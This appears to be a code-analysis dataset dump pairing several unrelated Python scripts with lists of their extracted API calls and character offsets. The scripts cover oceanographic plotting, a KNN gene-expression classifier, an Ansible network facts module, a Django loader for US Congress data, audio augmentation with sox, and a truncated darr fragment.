"matplotlib.gridspec.GridSpec",
"salishsea_tools.visualisations.contour_thalweg",
"salishsea_tools.viz_tools.set_aspect",
"numpy.arange"
] | [((4625, 4687), 'numpy.ma.masked_where', 'np.ma.masked_where', (["(mesh_mask['tmask'][0, ...] == 0)", 'tracer_hr'], {}), "(mesh_mask['tmask'][0, ...] == 0, tracer_hr)\n", (4643, 4687), True, 'import numpy as np\n'), ((5016, 5224), 'types.SimpleNamespace', 'SimpleNamespace', ([], {'tracer_var': 'tracer_var', 'tracer_hr': 'tracer_hr', 'surface_hr': 'surface_hr', 'surface_j_limits': '(sj, ej)', 'surface_i_limits': '(si, ei)', 'thalweg_depth_limits': '(0, 450)', 'thalweg_length_limits': '(0, 632)'}), '(tracer_var=tracer_var, tracer_hr=tracer_hr, surface_hr=\n surface_hr, surface_j_limits=(sj, ej), surface_i_limits=(si, ei),\n thalweg_depth_limits=(0, 450), thalweg_length_limits=(0, 632))\n', (5031, 5224), False, 'from types import SimpleNamespace\n'), ((5327, 5402), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize', 'facecolor': "theme.COLOURS['figure']['facecolor']"}), "(figsize=figsize, facecolor=theme.COLOURS['figure']['facecolor'])\n", (5337, 5402), True, 'import matplotlib.pyplot as plt\n'), ((5413, 5459), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {'width_ratios': '[1.4, 1]'}), '(1, 2, width_ratios=[1.4, 1])\n', (5430, 5459), False, 'from matplotlib import gridspec\n'), ((6220, 6321), 'numpy.arange', 'np.arange', (['percent_2_thalweg', 'percent_98_thalweg', '((percent_98_thalweg - percent_2_thalweg) / 20.0)'], {}), '(percent_2_thalweg, percent_98_thalweg, (percent_98_thalweg -\n percent_2_thalweg) / 20.0)\n', (6229, 6321), True, 'import numpy as np\n'), ((6371, 6460), 'numpy.arange', 'np.arange', (['percent_2_surf', 'percent_98_surf', '((percent_98_surf - percent_2_surf) / 20.0)'], {}), '(percent_2_surf, percent_98_surf, (percent_98_surf -\n percent_2_surf) / 20.0)\n', (6380, 6460), True, 'import numpy as np\n'), ((6602, 6832), 'salishsea_tools.visualisations.contour_thalweg', 'vis.contour_thalweg', (['ax', 'plot_data.tracer_hr', 'bathy', 'mesh_mask'], {'clevels': 'clevels', 'cmap': 'cmap', 'thalweg_file': '"""/SalishSeaCast/tools/bathymetry/thalweg_working.txt"""', 'cbar_args': "{'fraction': 0.03, 'pad': 0.04, 'aspect': 45}"}), "(ax, plot_data.tracer_hr, bathy, mesh_mask, clevels=\n clevels, cmap=cmap, thalweg_file=\n '/SalishSeaCast/tools/bathymetry/thalweg_working.txt', cbar_args={\n 'fraction': 0.03, 'pad': 0.04, 'aspect': 45})\n", (6621, 6832), True, 'from salishsea_tools import visualisations as vis\n'), ((8240, 8302), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['mesh'], {'ax': 'ax', 'fraction': '(0.034)', 'pad': '(0.04)', 'aspect': '(45)'}), '(mesh, ax=ax, fraction=0.034, pad=0.04, aspect=45)\n', (8252, 8302), True, 'import matplotlib.pyplot as plt\n'), ((8907, 8931), 'salishsea_tools.viz_tools.set_aspect', 'viz_tools.set_aspect', (['ax'], {}), '(ax)\n', (8927, 8931), False, 'from salishsea_tools import viz_tools\n'), ((8006, 8055), 'numpy.arange', 'np.arange', (['*plot_data.surface_i_limits'], {'dtype': 'int'}), '(*plot_data.surface_i_limits, dtype=int)\n', (8015, 8055), True, 'import numpy as np\n'), ((8065, 8114), 'numpy.arange', 'np.arange', (['*plot_data.surface_j_limits'], {'dtype': 'int'}), '(*plot_data.surface_j_limits, dtype=int)\n', (8074, 8114), True, 'import numpy as np\n'), ((5870, 5913), 'numpy.ma.masked_values', 'np.ma.masked_values', (['plot_data.tracer_hr', '(0)'], {}), '(plot_data.tracer_hr, 0)\n', (5889, 5913), True, 'import numpy as np\n'), ((5984, 6027), 'numpy.ma.masked_values', 'np.ma.masked_values', (['plot_data.tracer_hr', '(0)'], {}), '(plot_data.tracer_hr, 0)\n', (6003, 6027), True, 'import numpy as np\n')] |
#!/usr/bin/env python 3.6
# -*- coding: utf-8 -*-
"""
Created on Saturdau Sep 16 16:58:58 2017
@author: Hans - Clément - Ali
"""
#----------Import_module-----------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_curve, auc
from sklearn import neighbors
try:
import ConfigParser as conf
except:
import configparser as conf
# KNN =+> on va voir quel sont les individus qui se ressemble et on va prendre des décision
#-------------------Fontion------------------------------------
def plot(genes) :
plt.pcolor(genes[np.arange(100)])
plt.colorbar()
plt.title('Example of gene expressions')
plt.ylabel('samples')
plt.xlabel('genes')
plt.show()
def geneHightCorrelation(G,Y) :
ncol = G.shape[1]
rho = np.zeros(ncol)
for k in range (ncol) :
#print (len(G[1:,k]))
#print (len(Y))
#print (G[1:,k], Y)
c = np.corrcoef(G[1:,k].astype(float), Y.astype(float))
rho[k] = c [0,1]
#print (rho)
w = np.nonzero(abs(rho)>.1)[0] # On sélecionne uniquement les genes qui ont un
# coefficient de corrélation > 0.1
#print (len(w))
#print (w)
return (rho, w)
def knn (G,Y) :
w = geneHightCorrelation(G,Y)[1]
n = len (X[0]) # Nbre d'échantillon
Xw = X[w] # Recupère les valeurs d'expression des gènes avec un coeff > 0.1
#print (n)
Xw = Xw[1:]
b=100
n_neighbors = np.arange(1,7)
ErrClassif = np.zeros([len(n_neighbors),b])
#print (ErrClassif)
for i in range (b) :
itrain, itest = train_test_split(range(0, n-1), test_size = 0.25)
Xtrain = Xw.iloc[itrain]
ytrain = Y[np.asarray(itrain)] # because itrain is a list
# and y is indexed from 6 to ...
ytest = Y[np.asarray(itest)] # because itest is a list
for j in n_neighbors:
clf = neighbors.KNeighborsClassifier(j)
clf.fit(Xtrain, ytrain)
yhat = clf.predict(Xw.iloc[itest])
#print (yhat)
ErrClassif[j-1,99] = np.mean(ytest!=yhat)
#print (ErrClassif)
return (ErrClassif, n_neighbors)
"""
# Best result for 1 neighbor
ibest = 1
ntest = 10 # 10 because len(itest) = 10
y_score = np.zeros([ntest,B]) # 10 because len(itest) = 10
y_test = np.zeros([ntest,B]) # 10 because len(itest) = 10
for b in range(B):
itrain,itest=train_test_split(range(0,n-1),test_size=0.25)
Xtrain = Xw.iloc[itrain]
ytrain = Y[np.asarray(itrain)] # because itrain is a list
# and y is indexed from 6 to ...
ytest = Y[np.asarray(itest)] # because itest is a list
y_test[:,b] = ytest
clf = neighbors.KNeighborsClassifier(ibest)
clf.fit(Xtrain, ytrain)
y_score[:,b] = clf.predict_proba(Xw.iloc[itest])[:,1]
ROC(y_test,y_score,"kNN, 1 neighbor")
"""
#----------------Menu Principale----------------------------------
config = conf.ConfigParser()
config.readfp(open('../configuration.ini','r'))
xtrain= config.get('Data', 'xtrain')
path_xtrain = str(xtrain)
gene = pd.read_table("../data/xtrain.txt", header=None)
labels = pd.read_table("../data/ytrain.txt", header=None)
ncol = gene.shape[1]
X = gene.T
Y = np.array(labels).reshape(184)
G = np.array(X)
geneHightCorrelation(G,Y)
ErrClassif , n_neighbors = knn (G,Y)
#plt.boxplot(ErrClassif.T,labels=n_neighbors)
plt.plot(ErrClassif.T)
plt.ylim(0,1)
plt.ylabel('Mean classification error')
plt.xlabel('nb of neighbors')
#plt.plot(rho)
plt.show()
| [
"numpy.mean",
"matplotlib.pyplot.title",
"configparser.ConfigParser",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.colorbar",
"numpy.asarray",
"sklearn.neighbors.KNeighborsClassifier",
"numpy.array",
"numpy.zeros",
"pandas.read_table",
... | [((2982, 3001), 'configparser.ConfigParser', 'conf.ConfigParser', ([], {}), '()\n', (2999, 3001), True, 'import configparser as conf\n'), ((3126, 3174), 'pandas.read_table', 'pd.read_table', (['"""../data/xtrain.txt"""'], {'header': 'None'}), "('../data/xtrain.txt', header=None)\n", (3139, 3174), True, 'import pandas as pd\n'), ((3185, 3233), 'pandas.read_table', 'pd.read_table', (['"""../data/ytrain.txt"""'], {'header': 'None'}), "('../data/ytrain.txt', header=None)\n", (3198, 3233), True, 'import pandas as pd\n'), ((3312, 3323), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (3320, 3323), True, 'import numpy as np\n'), ((3443, 3465), 'matplotlib.pyplot.plot', 'plt.plot', (['ErrClassif.T'], {}), '(ErrClassif.T)\n', (3451, 3465), True, 'import matplotlib.pyplot as plt\n'), ((3467, 3481), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0)', '(1)'], {}), '(0, 1)\n', (3475, 3481), True, 'import matplotlib.pyplot as plt\n'), ((3482, 3521), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mean classification error"""'], {}), "('Mean classification error')\n", (3492, 3521), True, 'import matplotlib.pyplot as plt\n'), ((3523, 3552), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""nb of neighbors"""'], {}), "('nb of neighbors')\n", (3533, 3552), True, 'import matplotlib.pyplot as plt\n'), ((3570, 3580), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3578, 3580), True, 'import matplotlib.pyplot as plt\n'), ((721, 735), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (733, 735), True, 'import matplotlib.pyplot as plt\n'), ((741, 781), 'matplotlib.pyplot.title', 'plt.title', (['"""Example of gene expressions"""'], {}), "('Example of gene expressions')\n", (750, 781), True, 'import matplotlib.pyplot as plt\n'), ((787, 808), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""samples"""'], {}), "('samples')\n", (797, 808), True, 'import matplotlib.pyplot as plt\n'), ((814, 833), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""genes"""'], {}), "('genes')\n", (824, 833), True, 'import matplotlib.pyplot as plt\n'), ((839, 849), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (847, 849), True, 'import matplotlib.pyplot as plt\n'), ((913, 927), 'numpy.zeros', 'np.zeros', (['ncol'], {}), '(ncol)\n', (921, 927), True, 'import numpy as np\n'), ((1515, 1530), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {}), '(1, 7)\n', (1524, 1530), True, 'import numpy as np\n'), ((3277, 3293), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (3285, 3293), True, 'import numpy as np\n'), ((699, 713), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (708, 713), True, 'import numpy as np\n'), ((1736, 1754), 'numpy.asarray', 'np.asarray', (['itrain'], {}), '(itrain)\n', (1746, 1754), True, 'import numpy as np\n'), ((1857, 1874), 'numpy.asarray', 'np.asarray', (['itest'], {}), '(itest)\n', (1867, 1874), True, 'import numpy as np\n'), ((1939, 1972), 'sklearn.neighbors.KNeighborsClassifier', 'neighbors.KNeighborsClassifier', (['j'], {}), '(j)\n', (1969, 1972), False, 'from sklearn import neighbors\n'), ((2087, 2109), 'numpy.mean', 'np.mean', (['(ytest != yhat)'], {}), '(ytest != yhat)\n', (2094, 2109), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
"""
The iosxr snmp_server fact class
It is in this file the configuration is collected from the device
for a given resource, parsed, and the facts tree is populated
based on the configuration.
"""
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common import (
utils,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.rm_templates.snmp_server import (
Snmp_serverTemplate,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.argspec.snmp_server.snmp_server import (
Snmp_serverArgs,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import (
flatten_config,
)
class Snmp_serverFacts(object):
""" The iosxr snmp_server facts class
"""
def __init__(self, module, subspec="config", options="options"):
self._module = module
self.argument_spec = Snmp_serverArgs.argument_spec
def get_config(self, connection):
return connection.get("show running-config snmp-server")
def populate_facts(self, connection, ansible_facts, data=None):
""" Populate the facts for Snmp_server network resource
:param connection: the device connection
:param ansible_facts: Facts dictionary
:param data: previously collected conf
:rtype: dictionary
:returns: facts
"""
facts = {}
objs = []
if not data:
data = self.get_config(connection)
flatten_context_list = [
"snmp-server vrf",
"snmp-server mib bulkstat schema",
"snmp-server mib bulkstat transfer-id",
"snmp-server correlator rule",
"snmp-server interface",
"snmp-server correlator rule",
"snmp-server correlator ruleset",
]
for x in flatten_context_list:
data = flatten_config(data, x)
# parse native config using the Snmp_server template
snmp_server_parser = Snmp_serverTemplate(
lines=data.splitlines(), module=self._module
)
objs = snmp_server_parser.parse()
dict_to_list = [
"context",
"mib_object_lists",
"mib_schema",
"mib_bulkstat_transfer_ids",
"vrfs",
"interfaces",
]
for i in dict_to_list:
if i in objs:
objs[i] = list(objs[i].values())
if i == "vrfs":
for j in objs[i]:
j["hosts"].remove({})
j["context"] = list(j["context"].values())
ansible_facts["ansible_network_resources"].pop("snmp_server", None)
params = utils.remove_empties(
snmp_server_parser.validate_config(
self.argument_spec, {"config": objs}, redact=True
)
)
facts["snmp_server"] = params.get("config", {})
ansible_facts["ansible_network_resources"].update(facts)
return ansible_facts
| [
"ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils.flatten_config"
] | [((2112, 2135), 'ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils.flatten_config', 'flatten_config', (['data', 'x'], {}), '(data, x)\n', (2126, 2135), False, 'from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import flatten_config\n')] |
import csv
import os
import requests
import us
from datetime import datetime
from django.core.management.base import BaseCommand
from django.contrib.humanize.templatetags.humanize import ordinal
from fullstack.models import (
Body,
Division,
DivisionLevel,
Office,
Officeholder,
Party,
Person,
)
from tqdm import tqdm
BASE_URL = "https://api.propublica.org/congress/v1"
API_PARTY_MAP = {"R": "Republican", "D": "Democrat", "ID": "Independent"}
class Command(BaseCommand):
def create_division_levels(self):
self.country, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.COUNTRY
)
self.state, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.STATE, parent=self.country
)
self.county, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.COUNTY, parent=self.state
)
self.district, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.DISTRICT, parent=self.state
)
self.township, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.TOWNSHIP, parent=self.county
)
self.precinct, created = DivisionLevel.objects.get_or_create(
name=DivisionLevel.PRECINCT, parent=self.county
)
def create_divisions(self, f, districts_per_state):
usa, created = Division.objects.get_or_create(
name="United States of America",
label="United States of America",
short_label="USA",
level=self.country,
)
for state in us.states.STATES:
f.seek(0)
this_state, created = Division.objects.get_or_create(
name=state.name,
label=state.name,
short_label=state.abbr,
code=state.fips,
parent=usa,
level=self.state,
)
for district_state in districts_per_state:
if district_state["state"] == state.name:
num_districts = int(district_state["districts"])
if num_districts == 1:
Division.objects.get_or_create(
name="{} at-large congressional district".format(
state.name
),
label="{} at-large congressional district".format(
state.name
),
short_label="{}-AL".format(state.abbr),
code="{}-AL".format(state.abbr),
parent=this_state,
level=self.district,
)
else:
for x in range(1, num_districts + 1):
Division.objects.get_or_create(
name="{} {} congressional district".format(
state.name, ordinal(x)
),
label="{} {} congressional district".format(
state.name, ordinal(x)
),
short_label="{}-{}".format(
state.abbr, str(x).zfill(2)
),
code="{}-{}".format(state.abbr, str(x).zfill(2)),
parent=this_state,
level=self.district,
)
def build_congressional_offices(self, chamber):
r = requests.get(
"{0}/{1}/{2}/members.json".format(BASE_URL, "116", chamber),
headers={
"X-API-Key": os.environ.get("PROPUBLICA_CONGRESS_API_KEY")
},
)
members = r.json()
print("Loading U.S. {0} offices".format(chamber.title()))
for member in tqdm(members["results"][0]["members"]):
full_state = us.states.lookup(member["state"])
if int(full_state.fips) > 56 or int(full_state.fips) == 11:
continue
if chamber == "senate":
for class_tup in Office.SENATE_CLASSES:
if class_tup[0] == member["senate_class"]:
senate_class = class_tup[0]
name = "U.S. Senate, {0}, Class {1}".format(
full_state.name, senate_class
)
division = Division.objects.get(
level=self.state, short_label=member["state"]
)
elif chamber == "house":
senate_class = None
name = "<NAME>, {0}, District {1}".format(
full_state.name, member["district"]
)
if member["at_large"]:
code = "{}-AL".format(member["state"])
else:
code = "{}-{}".format(
member["state"], member["district"].zfill(2)
)
division = Division.objects.get(level=self.district, code=code)
body = Body.objects.get(slug=chamber)
office, created = Office.objects.get_or_create(
name=name,
label=name,
division=division,
body=body,
senate_class=senate_class,
)
print(member["last_name"], member["party"])
party = Party.objects.get(label=API_PARTY_MAP[member["party"]])
person, created = Person.objects.get_or_create(
first_name=member["first_name"],
last_name=member["last_name"],
gender=member["gender"],
)
if chamber == "senate":
if not member.get("next_election"):
term_start = 2018
term_end = 2020
else:
term_start = int(member["next_election"]) - 6
term_end = int(member["next_election"])
else:
term_start = 2018
term_end = int(member["next_election"])
Officeholder.objects.get_or_create(
office=office,
party=party,
person=person,
term_start=datetime(term_start, 1, 1),
term_end=datetime(term_end, 1, 1),
)
def handle(self, *args, **options):
Body.objects.get_or_create(
slug="senate", label="U.S. Senate", short_label="Senate"
)
Body.objects.get_or_create(
slug="house",
label="U.S. House of Representatives",
short_label="U.S. House",
)
print("Loading political parties")
Party.objects.get_or_create(label="Republican", short_label="GOP")
Party.objects.get_or_create(label="Democrat", short_label="Dem")
Party.objects.get_or_create(label="Libertarian", short_label="Lib")
Party.objects.get_or_create(label="Green", short_label="GP")
Party.objects.get_or_create(label="Independent", short_label="Ind")
self.create_division_levels()
cmd_path = os.path.dirname(os.path.realpath(__file__))
csv_path = os.path.join(cmd_path, "../../bin/districts.csv")
with open(csv_path) as f:
districts_per_state = csv.DictReader(f)
self.create_divisions(f, districts_per_state)
for chamber in ["senate", "house"]:
self.build_congressional_offices(chamber)
| [
"fullstack.models.Body.objects.get_or_create",
"datetime.datetime",
"csv.DictReader",
"fullstack.models.Body.objects.get",
"tqdm.tqdm",
"os.path.join",
"os.environ.get",
"fullstack.models.Office.objects.get_or_create",
"fullstack.models.Party.objects.get",
"fullstack.models.Party.objects.get_or_cr... | [((574, 637), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.COUNTRY'}), '(name=DivisionLevel.COUNTRY)\n', (609, 637), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((691, 778), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.STATE', 'parent': 'self.country'}), '(name=DivisionLevel.STATE, parent=self.\n country)\n', (726, 778), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((828, 914), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.COUNTY', 'parent': 'self.state'}), '(name=DivisionLevel.COUNTY, parent=self.\n state)\n', (863, 914), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((966, 1054), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.DISTRICT', 'parent': 'self.state'}), '(name=DivisionLevel.DISTRICT, parent=\n self.state)\n', (1001, 1054), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1106, 1195), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.TOWNSHIP', 'parent': 'self.county'}), '(name=DivisionLevel.TOWNSHIP, parent=\n self.county)\n', (1141, 1195), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1247, 1336), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.PRECINCT', 'parent': 'self.county'}), '(name=DivisionLevel.PRECINCT, parent=\n self.county)\n', (1282, 1336), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1434, 1575), 'fullstack.models.Division.objects.get_or_create', 'Division.objects.get_or_create', ([], {'name': '"""United States of America"""', 'label': '"""United States of America"""', 'short_label': '"""USA"""', 'level': 'self.country'}), "(name='United States of America', label=\n 'United States of America', short_label='USA', level=self.country)\n", (1464, 1575), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3836, 3874), 'tqdm.tqdm', 'tqdm', (["members['results'][0]['members']"], {}), "(members['results'][0]['members'])\n", (3840, 3874), False, 'from tqdm import tqdm\n'), ((6407, 6496), 'fullstack.models.Body.objects.get_or_create', 'Body.objects.get_or_create', ([], {'slug': '"""senate"""', 'label': '"""U.S. Senate"""', 'short_label': '"""Senate"""'}), "(slug='senate', label='U.S. Senate', short_label=\n 'Senate')\n", (6433, 6496), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6522, 6632), 'fullstack.models.Body.objects.get_or_create', 'Body.objects.get_or_create', ([], {'slug': '"""house"""', 'label': '"""U.S. House of Representatives"""', 'short_label': '"""U.S. House"""'}), "(slug='house', label=\n 'U.S. House of Representatives', short_label='U.S. House')\n", (6548, 6632), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6728, 6794), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Republican"""', 'short_label': '"""GOP"""'}), "(label='Republican', short_label='GOP')\n", (6755, 6794), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6804, 6868), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Democrat"""', 'short_label': '"""Dem"""'}), "(label='Democrat', short_label='Dem')\n", (6831, 6868), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6878, 6945), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Libertarian"""', 'short_label': '"""Lib"""'}), "(label='Libertarian', short_label='Lib')\n", (6905, 6945), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6955, 7015), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Green"""', 'short_label': '"""GP"""'}), "(label='Green', short_label='GP')\n", (6982, 7015), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7025, 7092), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Independent"""', 'short_label': '"""Ind"""'}), "(label='Independent', short_label='Ind')\n", (7052, 7092), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7215, 7264), 'os.path.join', 'os.path.join', (['cmd_path', '"""../../bin/districts.csv"""'], {}), "(cmd_path, '../../bin/districts.csv')\n", (7227, 7264), False, 'import os\n'), ((1726, 1866), 'fullstack.models.Division.objects.get_or_create', 'Division.objects.get_or_create', ([], {'name': 'state.name', 'label': 'state.name', 'short_label': 'state.abbr', 'code': 'state.fips', 'parent': 'usa', 'level': 'self.state'}), '(name=state.name, label=state.name,\n short_label=state.abbr, code=state.fips, parent=usa, level=self.state)\n', (1756, 1866), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3901, 3934), 'us.states.lookup', 'us.states.lookup', (["member['state']"], {}), "(member['state'])\n", (3917, 3934), False, 'import us\n'), ((5067, 5097), 'fullstack.models.Body.objects.get', 'Body.objects.get', ([], {'slug': 'chamber'}), '(slug=chamber)\n', (5083, 5097), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5129, 5242), 'fullstack.models.Office.objects.get_or_create', 'Office.objects.get_or_create', ([], {'name': 'name', 'label': 'name', 'division': 'division', 'body': 'body', 'senate_class': 'senate_class'}), '(name=name, label=name, division=division, body\n =body, senate_class=senate_class)\n', (5157, 5242), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5410, 5465), 'fullstack.models.Party.objects.get', 'Party.objects.get', ([], {'label': "API_PARTY_MAP[member['party']]"}), "(label=API_PARTY_MAP[member['party']])\n", (5427, 5465), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5497, 5619), 'fullstack.models.Person.objects.get_or_create', 'Person.objects.get_or_create', ([], {'first_name': "member['first_name']", 'last_name': "member['last_name']", 'gender': "member['gender']"}), "(first_name=member['first_name'], last_name=\n member['last_name'], gender=member['gender'])\n", (5525, 5619), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7168, 7194), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7184, 7194), False, 'import os\n'), ((7334, 7351), 'csv.DictReader', 'csv.DictReader', (['f'], {}), '(f)\n', (7348, 7351), False, 'import csv\n'), ((4397, 4464), 'fullstack.models.Division.objects.get', 'Division.objects.get', ([], {'level': 'self.state', 'short_label': "member['state']"}), "(level=self.state, short_label=member['state'])\n", (4417, 4464), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3648, 3693), 'os.environ.get', 'os.environ.get', (['"""PROPUBLICA_CONGRESS_API_KEY"""'], {}), "('PROPUBLICA_CONGRESS_API_KEY')\n", (3662, 3693), False, 'import os\n'), ((4994, 5046), 'fullstack.models.Division.objects.get', 'Division.objects.get', ([], {'level': 'self.district', 'code': 'code'}), '(level=self.district, code=code)\n', (5014, 5046), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6265, 6291), 'datetime.datetime', 'datetime', (['term_start', '(1)', '(1)'], {}), '(term_start, 1, 1)\n', (6273, 6291), False, 'from datetime import datetime\n'), ((6318, 6342), 'datetime.datetime', 'datetime', (['term_end', '(1)', '(1)'], {}), '(term_end, 1, 1)\n', (6326, 6342), False, 'from datetime import datetime\n'), ((2941, 2951), 'django.contrib.humanize.templatetags.humanize.ordinal', 'ordinal', (['x'], {}), '(x)\n', (2948, 2951), False, 'from django.contrib.humanize.templatetags.humanize import ordinal\n'), ((3088, 3098), 'django.contrib.humanize.templatetags.humanize.ordinal', 'ordinal', (['x'], {}), '(x)\n', (3095, 3098), False, 'from django.contrib.humanize.templatetags.humanize import ordinal\n')] |
import sox
import numpy as np
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument("--input", help="input file name")
args = parser.parse_args()
print(args.input)
np1 = np.arange(start=-1.0, stop=1.1, step=0.10)
np2 = np.arange(start=0.9, stop=1.11, step=0.01)
np3 = np.arange(start=0.9, stop=1.11, step=0.01)
np4 = np.arange(start=-5.0, stop=5.5, step=0.5)
np.random.shuffle(np1)
np.random.shuffle(np2)
np.random.shuffle(np3)
np.random.shuffle(np4)
x = 0
command ='mv ' + args.input + ' temp.wav'
os.system(command)
while x < 21:
tfm1 = sox.Transformer()
pitch_offset = round(np1[x],1)
tempo_offset = round(np2[x],1)
gain_offset = round(np4[x],1)
tfm1.pitch(pitch_offset)
tfm1.gain(gain_offset, False)
tfm1.tempo(tempo_offset, 's')
tfm1.build_file('temp.wav', 'pp' + str(x) + '-' + args.input)
x = x + 1
| [
"sox.Transformer",
"argparse.ArgumentParser",
"os.system",
"numpy.arange",
"numpy.random.shuffle"
] | [((66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (89, 91), False, 'import argparse\n'), ((203, 244), 'numpy.arange', 'np.arange', ([], {'start': '(-1.0)', 'stop': '(1.1)', 'step': '(0.1)'}), '(start=-1.0, stop=1.1, step=0.1)\n', (212, 244), True, 'import numpy as np\n'), ((252, 294), 'numpy.arange', 'np.arange', ([], {'start': '(0.9)', 'stop': '(1.11)', 'step': '(0.01)'}), '(start=0.9, stop=1.11, step=0.01)\n', (261, 294), True, 'import numpy as np\n'), ((301, 343), 'numpy.arange', 'np.arange', ([], {'start': '(0.9)', 'stop': '(1.11)', 'step': '(0.01)'}), '(start=0.9, stop=1.11, step=0.01)\n', (310, 343), True, 'import numpy as np\n'), ((350, 391), 'numpy.arange', 'np.arange', ([], {'start': '(-5.0)', 'stop': '(5.5)', 'step': '(0.5)'}), '(start=-5.0, stop=5.5, step=0.5)\n', (359, 391), True, 'import numpy as np\n'), ((393, 415), 'numpy.random.shuffle', 'np.random.shuffle', (['np1'], {}), '(np1)\n', (410, 415), True, 'import numpy as np\n'), ((416, 438), 'numpy.random.shuffle', 'np.random.shuffle', (['np2'], {}), '(np2)\n', (433, 438), True, 'import numpy as np\n'), ((439, 461), 'numpy.random.shuffle', 'np.random.shuffle', (['np3'], {}), '(np3)\n', (456, 461), True, 'import numpy as np\n'), ((462, 484), 'numpy.random.shuffle', 'np.random.shuffle', (['np4'], {}), '(np4)\n', (479, 484), True, 'import numpy as np\n'), ((534, 552), 'os.system', 'os.system', (['command'], {}), '(command)\n', (543, 552), False, 'import os\n'), ((577, 594), 'sox.Transformer', 'sox.Transformer', ([], {}), '()\n', (592, 594), False, 'import sox\n')] |
from darr.basedatadir import BaseDataDir, create_basedatadir
from darr.metadata import MetaData
from ._version import get_versions
#TODO: required keys for sndinfo
class DataDir(BaseDataDir):
